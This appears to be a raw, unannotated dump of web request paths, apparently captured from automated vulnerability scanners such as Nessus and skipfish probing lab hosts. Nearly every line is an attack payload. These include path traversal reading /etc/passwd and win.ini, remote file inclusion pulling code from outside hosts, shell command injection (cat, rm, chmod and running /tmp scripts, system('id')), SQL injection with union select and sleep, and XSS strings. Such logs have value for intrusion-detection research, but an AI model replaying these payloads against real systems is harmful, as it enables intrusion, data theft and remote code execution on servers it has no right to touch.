/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl /manager/wordtrans.php?command=show_desc&advanced=1";id; true " /flash-xss/ /scripts/index.php?board=nonexistant1452986522 /8x6w469u.asp? /examples/jsp/jsp2/el/al_initialize.php?alpath=/etc/passwd\x00 /l13b77e5.kspx? /help.php?q="rm q63986192&rem /script/_conf/core/common-tpl-vars.php?confdir=@rfiurl?confdir=@rfiurl? /phpmyadmin/index.php?gadget=glossary&action=view&term= /main.php?logout="del\x0cq94269861&rem\x0c /cacti/texis.exe/nessus /javascript/.htpasswd.sfish/-2147483649 /databasesubscriptionsthumb/ /javascript/hour.exe /cgibin/fileseek.cgi?foot=&head=;cat /etc/passwd| /albums/userpics/copperminer.jpg.php?cat /etc/passwd /en-us/account/include/theme.inc.php?fullpath=/etc/passwd\x00 /ju0u7kfo.html? /cgi-sys/fileseek2.cgi?foot=&head=;cat /etc/passwd| /javascript/broker.exe /examples/jsp/num/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00 /examples/jsp/jsp2/el/admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/jsp2/jspx/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /x7pclv4s.nsf? /main.php?logout='\x0dsleep\x0910\x09# /cabela's african safari/ /examples/servlets/servlet/auktion.cgi?menue=../../../../../../../../../etc/passwd /scripts/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00 /nmw0do67.php3? /scripts/d3z7yywpyeoa.asp /kernel/loadkernel.php?installpath=/etc/passwd\x00 /v3axg1p8.jspa? /mod_membre/inscription.php?chemin=http://192.168.202.118:8080/moclyxlwqyfjnp?? /5qnlm5z2.aspx? /en-us/w4996nr0.mscgi? /examples/jsp/checkbox/forum_2.php?msg=10&return= /ridin'high/ /? /examples/jsp/checkbox/core/editor.php?editor_insert_bottom=/etc/passwd /help.php?q="&ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /help.php?q="|ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09 /search.cgi?qt="&search.x=0&search.y=0 /cgi-local/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /main.php?stuff="ping\x0b-w\x0b9000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../vtigerservice.php\x00 /javascript/.htaccess.sfish/\'\" /base_local_rules.php?dir= /o35zot2r.kspx? /mod_membre/inscription.php?chemin=http://cirt.net/rfiinc.txt?? /i2n4v4rl.cfc? /examples/servlets/servlet/index.php?include_files[]=&include_files[query_string]=/etc/passwd /main.php?stuff="rm\x09q12267523&rem\x09 /examples/jsp/error/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /fc9t54l7.cfm? /cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /cgi-bin/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /msvcrt.exe/ /scripts/nffhikq061nq.asp /miz4r5hz.cfc? /tamambolo_scriptprocdump/ /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=q23487867&scr_height=&scr_width= /igtf0zon.fts? /ybz5rz7a.x? /javascript/certified.exe /examples/servlets/servlet/user.cgi?url=">&from=add /scripts/index.php?page=/etc/passwd\x00 /33y9gcqq.htm? /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00 /scripting guide/ /phpmyadmin/search= /subscriptions.jsf /miz4r5hz.x? /jdx255ea.jspa? /main.php?logout=1:"ls" /q703m78q.asp? /cgi-perl/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /scs86g1p.pl? /u95h6ymu.pl? /javascript/cgi-shl.exe /top.php?stuff='&uname\x09>q47253924\x09# /3j8echh0.cfc? /javascript/exec.exe /javascript/htpasswd.png /j734qobz.html? /o1zj4u9v.pl? /cacti/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /0u75ldxq.idc? /examples/jsp/jsp2/jspx/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini /1qwv2p5p.kspx? /manager/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435 /rpxyx07v.idc? /cgi-bin/index.php?template=../../../loudblog/custom/config.php\x00 /j2kdmfw4.mscgi? /help.php?q=;rm q13157688 # /main.php?stuff="ping,-w,7000,-n,1,4.3.2.1&rem, /0qhcnefz.fts? /cgi-bin/viewcvs.cgi/?cvsroot= /scripts/index.php?album=../../../../../../../../../../boot.ini\x00 /h4bi26jd.exe? /0w155a7c.php? /main.php?stuff="&del,q13326619&rem, /fcgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd //..\..\..\..\..\..\..\..\windows/win.ini /scriptguide/ /javascript/document.temp /top.php?stuff='uname\x09>q54162214\x09# /javascript/big.exe /d765w06j.do? /script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp? /manager/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'-- /recordings/al_initialize.php?alpath=/etc/passwd\x00 /jnv890lt.cgi? /cgi-914/texis.exe/junk /main.php?logout='\x0ddel q95689814 # /\x0a\x0a.jsp /phpmyadmin/sgdynamo.exe?htname=sgdynamo.exe /main.php?logout=&ver,>q27276952&rem, /scripts/includes/db_adodb.php?basedir=/etc/passwd\x00 /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /script//ident/index.php?path_inc=@rfiurl /help.php?q="ping -w 9000 -n 1 4.3.2.1&rem /help.php?q=&uname >q88293785 # /cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,929714876,0,0,0,0,0-- /top.php?stuff="\x0duname >q44371957 # /awstats/awstats.pl?migrate=|echo;echo x;echo|awstats340378.txt /en-us/9kr0ih0v.exe? /javascript/htpasswd.html /u8yiqilu.aspx? /templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/ghl9il? /addvip.php?msetstr["progsdir"]=http://192.168.202.118:8080/tzhfyzkbomspvm? /script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /top.php?stuff="&ver >q91375949&rem /scripts/tomcat_proxy_directory_traversal.nasl1332008334 /help.php?q="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b /javascript/letters.exe /javascript/paid.exe /examples/jsp/checkbox/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt /recordings/index.php?entry=' /vac1l5vm.do? /82q7ywa8.aspx? /ff_noscript/ /help.php?q=";del\x09q65733963\x09# /javascript/yearly.exe /javascript/opt.exe /examples/jsp/sessions/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /static//..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c/windows/win.ini /contribute.cgi?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl /javascript/shtml.exe /examples/jsp/checkbox/popup.php?include_path=/etc/passwd\x00 /33y9gcqq.fts? /javascript/makefile.exe /6dlc2zm9.dll? /examples/jsp/error/listrec.pl?app=qmh-news&template=;ls /etc| /scripts/printenv.pl /eei78ore.idc? /examples/jsp/jsp2/jspx/index.php?search='>&searchmode=f /scripting tools/ /htbin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /9o6g5vkn.html? /i686v90l.exe? /examples/jsp/num/home/search.asp?nchannel='1 /scripts/info.dat /tuwjta1w.htm? /scripts/ohelp/en_us/content/master/webadmin/webadmin.html /examples/jsp/cal/check_user_id.php?user_id= /main.php?stuff="ver;>q74579968&rem; /cgi-home/htimage.exe/path/filename?2,2 /index.php?op=default&date=200607' union select 1,1425852379,1,1,1,1,1,1,1,1--&blogid=1 /it's_cad-tastic!/ /javascript/htpasswd.csv /j4oqyvga.htm? /shop/normal_html.cgi?file=|cat /etc/passwd| /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null -- /en-us/dda2qr7j.cfm? /hipkz026.cfm? /qb2xy9aw.cfc? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+fa+>>ctdn /rbec2ohx.dll? /subscriptions.pfx /en-us/fo564rei.html? /j4rdyhw8.html? /bn857frh.dll? /nyjgaorz.jspa? /mod_membre/inscription.php?chemin=@rfiurl?chemin=@rfiurl? /conscripted_gifts/ /cgi-win/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /[seccheck]/..%2f..%2f../ext.ini /ybz5rz7a.idc? /cacti/index.php?act=arcade&do=stats&gameid=1' /scripts/zq9frlz6fcfp.pl /scripts/tools/dsnform.exe /bxnyrhmh.cfm? /d7ktpmcq.mscgi? /7u1pb2xi.idc? /cgi-win/sensepost.exe?/c+dir /scripts/force-download.php /admin/common/script.js.php.copy /scripts/nckowqpd4zng.sh /javascript/reprints.exe /forum-ra.asp?n=/etc/passwd /javascript/track.exe /recordings/starnet/addons/slideshow_full.php?album_name='1334444193 /m5103snj.idc? /examples/jsp/cal/index.php?gadget=glossary&action=viewterm&term= /javascript/cpadmin.exe /main.php?logout=';del\x09q16263765\x09# /scripts/include/theme.inc.php?fullpath=/etc/passwd\x00 /phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs' and sleep(4)=' /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=&scr_width=q27812776 /cgi-bin/awstatstotals.php?sort="].phpinfo().exit().$a[" /cgi-perl/msmmask.exe?mask=/junk334 /o35zot2r.pl? ftp://192.168.23.203/* /examples/jsp/error/fxm.exe /script/param/param.inc.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /en-us/.asp /scripts/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /top.php?stuff="&del\x09q45798999&rem\x09 /x7pclv4s.mscgi? /en-us/i686v90l.x? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+06+00+00+00+00+00+00+00+00+00+00+00+00+00+00+20+00+00+e0+44+41+54+41+00+00++>>esbq /phpmyadmin/hw3.cgi?daysonly=0).system('id').( /help.php?q='\x0auname >q83228487 # /zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/tzhfyzkbomspvm?? /l13b77e5.cfc? /javascript/oa_servlets.exe /tiasystemdescription/ /zuihld5m.jsp? /phpmyadmin/newsscript.pl?mode=admin /main.php?frm_daynight=day&frm_passwd=q75353854&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width= /cgi-bin/cgicso?query= /ygkjkngd.cgi? /?"> /cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /javascript/.passwd.phtml /poker tournament - no limit texas hold'em/ /scripts/sc877q2pzqne.cfm /recordings/sgdynamo.exe?htname=sgdynamo.exe /order/login.php?svr_rootscript=@rfiurl /en-us/33y9gcqq.mscgi? /nmw0do67.idc? /scripts/www/delivery/ac.php?bannerid=-1331908787+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ti5957ae]));die;/* /mv8wxfy9.nsf? /copatranscript_20061024/ /subscriptions.tar /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=dzp1jwatlet0voxta /qczkquis.jsp? /examples/jsp/cal/lang/index.php?file=/etc/passwd /aj3pf49c.php? /m2fpztty.pl? /hjdzm96v.cgi? /zshscripts/ /cgi/ion-p?page=../../../../../etc/passwd /zuihld5m.cgi? /cgi-bin/smartsearch.cgi?keywords=|/bin/cat /etc/passwd| /xsqln7eb.jspa? /examples/jsp/error/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /script/fckeditor/editor/dialog/fck_flash.html / /phpmyadmin//./../../../../../../../.windows/win.ini /help.php?q=ver\xa0>q95666948&rem\xa0 /examples/jsp/error/ftp/ftp.pl?dir=../../../../../../etc /javascript/categories.exe /cgi-binfaq.php?skin=../../admin/manager&tplpath=admin /cgi-perl/gw5/gwweb.exe?help=bad-request /examples/jsp/error/activatemember?activatecode=&member="> /main.php?frm_daynight=day&frm_passwd=&frm_referer=q33487769&frm_user=&scr_height=&scr_width= /cgi-bin/.htpasswd /dslpwt15.cfm? /main.php?stuff='\x0asleep\x099\x09# /mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /igtf0zon.idc? /pam-passwdqc/ // /scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/ipb5ri? /javascript/access-log.1.exe /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- /? /0qhcnefz.x? /um7xpn15.jspa? /examples/jsp/cal/index.php?cat=' /2004conferencedescription/ /homebet/homebet.dll?form=menu&option=menu-signin /scripts/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00 /manager/forumdisplay.php?fid=21"> /cgi-914/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd /popularvirusdescriptions/ /u8yiqilu.cfc? /? /javascript/minute.exe / /scripts/search.jsp?q=%" /cgi-bin/activeauctionsuperstore/iteminfo.asp?itemid=42' /opensearchdescription/ ftp://192.168.27.253/* /main.php?stuff="&del;q22147997&rem; /top.php?stuff="ver,>q37582953&rem, /awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/jbqahurnly.sh;echo|awstats912357.txt /6dlc2zm9.cfc? /qczkquis.cfm? /top.php?stuff="&del\x09q22847462\x09# /gvx7m5ti.php? /cgi-914/fileseek2.cgi?foot=;cat /etc/passwd&head= /help.php?q=";del q49727674 # /phpmyadmin//\..\..\..\..\..\..\..\..\windows/win.ini /javascript/promoted.exe /scripts/hosting/addsubsite.asp /j734qobz.do? /azcrfs8d.htm? /examples/jsp/cal/mlog.html?screen=/etc/passwd /en-us/9kr0ih0v.idc? /rpxyx07v.cfc? /help.php?q="&rm,q81149724&rem, /examples/servlets/servletsearch_results.dot?search_query=nessus">/ /0u75ldxq.kspx? /scripts/netpad.cgi /top.php?stuff="\x0drm q44371957 # /zroo33l4.jsp? /javascript/find.exe /j4rdyhw8.asp? /zuihld5m.pl? /manager/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo /fmnveedu.mscgi? /javascript/tape.exe /top.php?stuff="|ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09 /examples/jsp/sessions/dsweb/services/user-1"> /javascript/backups.exe /edition"/ /..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og /e9rx3ya4.asp? /manager/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /169okeyj.cfc? /fnwhrxyd.kspx? /scripts/base_local_rules.php?dir= //%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd /forum_arc.asp?n=`/etc/passwd`|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'`'. /phpmyadmin/language.php?data_dir=/etc/passwd\x00 /snowboardingxssmallicon/ /showmail.pl?folder= /aixssh/ /html/partner.php?mainfile=anything&default_theme=' /subscriptions.dump /cgi-win/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /0w155a7c.pl? /book review - how to say it when you don't know what to say/ /cgi-bin/simple/view_page?mv_arg=|cat /etc/passwd| /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /? /fc9t54l7.x? /jnv890lt.htm? /en-us/account/search.jsp?q=%" /scripts/wd7crx47eaml.shtml /transcript_tomwelsh050429/ /main.php?stuff="ping,-w,9000,-n,1,4.3.2.1|rem, /miz4r5hz.fts? /scripts/rvckwz6smkqf.pl /uc3w3bdi.x? /javascript/mobile.exe /scripts/nmap.php?target=|id /help.php?q="ver\x0b>q76374652&rem\x0b /examples/jsp/checkbox/includes/converter.inc.php?include_path=/etc/passwd\x00 /gvx7m5ti.asp? /en-us/i686v90l.asp? /en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\x00 /javascript/7.exe /xsqln7eb.php? /h5sc3gxy.cfc? /gpasswd/ /webscripts/ /d5a5renl.jsp? /examples/jsp/cal/includes/config.php?relative_script_path=http://xxxxxxx /scripts/vzdybnanqpc3.cgi /s7qus4g3.pl? /examples/jsp/jsp2/jspx/index.php?chemin=../../../../../../..//etc ..\\..\\..\\..\\..\\..\\windows\\win.ini /javascript/.passwd.exe /scripts/prnnucptkixl.inc /javascript/jdbc.exe /examples/jsp/cal/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /cgi-win/fileseek2.cgi?foot=&head=;cat /etc/passwd| /calendar_admin.pl?config=|cat /etc/passwd| /3j8echh0.jspa? /examples/jsp/error/workarea/contentdesigner/ekformsiframe.aspx?id="> /jnt3f86c.jspa? /top.php?stuff="&ver\x0c>q74447142&rem\x0c /examples/servlets/servlet/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /pam-passwdqc_0/ /uc3w3bdi.cfm? /j4oqyvga.jsp? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/mwukuzjaqe.sh+>+/dev/null+&')."]=1 /mrating.exe/ /scripta/ /javascript/import.exe /scripts/index.php?board=nonexistant522491339 /iv5vkgam.mscgi? /help.php?q="rm,q11574297&rem, /scripts/about.php /esmozg5d.dll? /javascript/footer.exe /examples/jsp/colors/index.php?name=your account&profile=anyone"> /forum-ra_professionnel.asp?n=../../boot.ini /main.php?stuff="\x0drm\x09q16681283\x09# //.../.../.../.../.../.../.../.../etc/passwd /search.asp?term=<\x00script>alert('vulnerable') /cgi-bin/index.php?string=' /en-us/jnv890lt.asp? /dir_thatware/config.php?root_path=http://192.168.202.96:8080/txenjrxf3?' /javascript/redir.exe /downloads/pafiledb.php?action=email&id=4?\"<script>alert('vulnerable')</script>\" /en-us/i686v90l.cfc? /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/tzhfyzkbomspvm? /main.php?logout="ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09 /x2gyorli.htm? /vjbrrppi.html? /oldscripts/ /cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411 /scripts/content.php?get_action=display_doc&doc_file=credits /j4oqyvga.htm? /scripts/calendar.php?month=' union select 1,1,'1331904667','calendarix_month_sql_injection.nasl',1 # /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008334','5'-- /microsoft windows html help control cross-zone scripting vulnerability/ /scripts/direct.php?rf=/etc/passwd\x00 /help.php?q='&rm\x09q78257168\x09# /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 -- /javascript/build.exe /main.php?stuff="ping,-w,7000,-n,1,1.2.3.4&rem, /cacti/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /cote' content/ /main.php?stuff="rm q82735586&rem /cgi-bin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /panelitprof'l/ /examples/servlets/servlet/index.php?cid=' /shopper.cgi?newpage=../../../../../../etc/passwd /javascript/mix.exe /pfdispaly.cgi?../../../../../../etc/passwd /php/php.exe?c:\winnt\win.ini /ht8pn8uq.jsp? /javascript/commerce.exe /p043snfr.fts? /javascript/csv.exe /session/login.php?dest=nessus"> /examples/jsp/colors/htsearch?exclude=`/etc/passwd` /examples/jsp/jsp2/el/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00 /main.php?logout=&ping;-w;10000;-n;1;1.2.3.4&rem; /33y9gcqq.pl? /? /nuh3zirz.php? /themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /scripts/admin.php?dpt=conf&sub=general /pxagj7n7.kspx? /jscriptpr2/ /ywaxntrx.cfm? /main.php?stuff=uname\x09>q57528363\x09# /azcrfs8d.idc? /examples/jsp/cal/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00 /main.php?logout=; /fnwhrxyd.jspa? /sysuser/docmgr/info.stm?path= /uc3w3bdi.idc? / /examples/jsp/error/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /../copy of /examples/jsp/error/mapserv.exe?map=mapserver_detect.nasl.map /auto's/ /scripts/index.php?libdir=http://xxxxxxxx /main.php?stuff=&uname >q88638447 # /zqqemp6j.fts? /main.php?logout="&rm q45435148 # /vac1l5vm.cfc? /cgi-exe/msmmask.exe?mask=/junk334 /javascript/openejb.exe /scripts/tombstone.cfm?profileid= /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=ylqi1ed35uhwi6jxf /cgi-bin/campas?\x0acat\x0a/etc/passwd\x0a /examples/jsp/error/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl /vhzmaia2.php3? /zuihld5m.cfc? /scripts/qop0sa1auif9.sh /en-us/fo564rei.x? /examples/jsp/error/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /archive.php?scriptpath=http://192.168.202.96:8080/vir0v3xfc?? /myscript-notes/ /en-us/account/forumdisplay.php?fid=21"> /d44uk9h2.do? /top.php?stuff="del q61593836&rem /o35zot2r.nsf? /eei78ore.php3? /l752x1ry.cfm? /main.php?stuff=2040844887' and 1=1 and ''<>'vzsvhedu /examples/jsp/error/index.php?op=default&date=200607' union select 1,1284682657,1,1,1,1,1,1,1,1--&blogid=1 /javascript/synced.exe /l752x1ry.nsf? /examples/jsp/checkbox/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /javascript/reqs.exe /examples/jsp/colors/main.php?g2_itemid=../../../../../license\x00 /index.php?album=../../../../../../../../../../etc/passwd\x00 /help.php?q=uname\x09>q95299561\x09# /zuihld5m.idc? /examples/servlets/servlet/save.php?file_save=/etc/passwd /examples/jsp/colors/includes/db_adodb.php?basedir=/etc/passwd\x00 /examples/jsp/cal/login.php?user="> /mv8wxfy9.html? /6wb70v0b.do? /top.php?stuff="|ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /scripts/topic.php?tid='select /r3le3om5.kspx? /examples/jsp/colors/help.php?section='qualiteam_xcart_sql_xss.nasl /cgi-915/a1disp3.cgi?../../../../../../../../../../etc/passwd /inc/download_center_lite.inc.php?script_root=http://cirt.net/rfiinc.txt? /en-us/s7qus4g3.pl? /9o6g5vkn.fts? /o35zot2r.do? /main.php?stuff=';rm q22931533 # /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16 /cgi-bin/.cobalt/message/message.cgi?info= /scripts/changelog /i686v90l.html? /7dbjwpw6.cfc? /examples/jsp/num/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /b5xdqgz2.dll? /fa8p8lr8.pl? /v3axg1p8.aspx? /manager/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00 /javascript/dbase.exe /fnwhrxyd.nsf? /javascript/document.js /examples/jsp/num/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print "content-type: text/plain\x0d\x0a\x0d\x0a";system(id)&action=logout /cgi-bin/search.php?allwords=
&cid=0&title=1&desc=1 /pxagj7n7.asp? /scripts/axdgpyi2bn6f.cfm /d5a5renl.asp? /scripts/k0pxpjgnimox.pl /main.php?logout="\x0asleep 11 # /linus's_law/ /main.php?stuff="rm;q23861899&rem; /manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00 /q703m78q.html? /jdx255ea.html? /scripts/cxvae_g3rjys.asp /'.$_server['php_self'].'?'.$_server['query_string'].'&act=img&img=delete /ydexw8by.asp? /phpmyadmin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331923203,1242183873 -- /cacti/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /vwmg565s.pl? /m4kkjf8l.x? /examples/jsp/jsp2/el/kernel/loadkernel.php?installpath=/etc/passwd\x00 /en-us/i686v90l.cfm? /en-us/oie504mr.mscgi? /examples/jsp/colors/index.php?module= /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 327415864-- /examples/jsp/error/htsearch?exclude=`/etc/passwd` /javascript/htpasswd.o /help.php?q=\x0duname\x09>q32573245\x09# /fnwhrxyd.cgi? /hrttz9fj.htm? /_vti_bin/fpcount.exe /xfkun1ku.fts? /forum-ra.asp?n=/etc/passwd\x00 /inscription_colloque/ /main.php?logout="rm;q16377729&rem; /profile.php?author_id='414295592513 /phpmyadmin//../../../../../../../../windows/win.ini /zuihld5m.pl? /tuwjta1w.mscgi? /en-us/account/kernel/loadkernel.php?installpath=/etc/passwd\x00 /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/eqskvgtjaq0;'); function v /main.php?logout=ping;-w;7000;-n;1;4.3.2.1&rem; /phpmyadmin.exe /javascript/money.exe /using logon scripts figure 41102332792318/ /examples/jsp/colors/search.pl?form=../../../../../../etc/passwd\x00 /examples/jsp/error/review.php?id=1&cat=&subcat="> /en-us/h5sc3gxy.jspa? /javascript/document.o /taskdir.exe/ /javascript/mp3.exe /apavxugx.idc? /wikka.php?wakka=homepage/../../actions/wikkachanges /help.php?q="ver >q63986192&rem /ewc3rz1l.aspx? /prescriptionforchange/ /0qhcnefz.php? /scripts/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /javascript/travel.exe /javascript/ganglia.exe /javascript/.htpasswd.sfish/'" /phpmyadmin/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- /javascript/technical.exe /javascript/5.exe /scripts/core/api.php?t_path_core=/etc/passwd\x00 /scripts/index.php?templates_dir=/etc/passwd\x00 /examples/jsp/calfaq.php?skin=../../admin/manager&tplpath=admin /javascript/technology.exe /7dbjwpw6.jspa? /newuser?image=../../database/rbsserv.mdb /iv5vkgam.kspx? /webdav/phprun.php?cmd=c:\wce.exe -w /j4rdyhw8.aspx? /g8nu2yy7.asp? /scriptheader/ /cgi-perl/a1disp3.cgi?../../../../../../../../../../etc/passwd /javascript/favorite.exe /help.php?q="&rm q44114596 # /q703m78q.cgi? /oie504mr.asp? /scripts/search.jsp?q=%" /javascript/q4.exe /t578vqea.exe? //\..\..\..\..\..\..\..\..\etc/passwd /phpslideshow.php?directory=x'><' /addyoursite.php?catid=<script>javascript:alert('vulnerable');</script> /gy23xnjq.fts? /cgi-bin/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13-- /index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'-- /scripts/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' /examples/jsp/sessions/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /javascript/dyn.exe /scripts/activatemember?activatecode=&member="> /esmozg5d.exe? /scripts/search.jsp?q=%" /scripts/lce0cbkfb8xx.inc /a? /javascript/posts.exe /javascript/software.exe /the schoolgirl group anal'six - schoolgirl love anal'six!/ /scripts/index.php?id=urjhxcl19w' /cgi-bin/ncbook/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /ht8pn8uq.x? /scripts/www/delivery/ac.php?bannerid=-371+or+1=1 /7dbjwpw6.exe? /package_descriptions/ /subscriptions.bin /examples/jsp/num/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /cgi-bin/album?mode=album&album=../../../../../../../../etc&dispsize=640&start=0 /j4drbkil.dll? /? /recordings/shopexd.asp?catalogid='42 /7uz3ok60.kspx? /phpmyadmin/index.php?user_langue=../../../../../../../../../../etc/passwd /excelextractscript/ /javascript/schedule.exe /manager/html;jsessionid=17f77181a13462b6efdf6796347078a4?org.apache.catalina.filters.csrf_nonce=57f47e5ed52a4c7e1f345608db2700e9 /0w155a7c.mscgi? /pscripts/ /cheech & chong's the corsican brothers 1984 dvdrip kvcd jamgood(tus release)/ /javascript/citrix.exe /o35zot2r.php3? /hwacha_description/ /main.php?stuff="&rm\x09q91551817\x09# /top.php?stuff="\x0ddel q44371957 # /main.php?stuff="&uname >q44697755 # /javascript/.passwd.old /greasemonkeyscriptforsmalltitles/ /cgi-bin/base_local_rules.php?dir= /cgi-bin/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /0rufe52p.kspx? /scripts/wxrdqnkjuwmu.inc /examples/jsp/error/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /help.php?q=';uname\x09>q84185561\x09# /v3axg1p8.pl? /y8pmygrp.cgi? 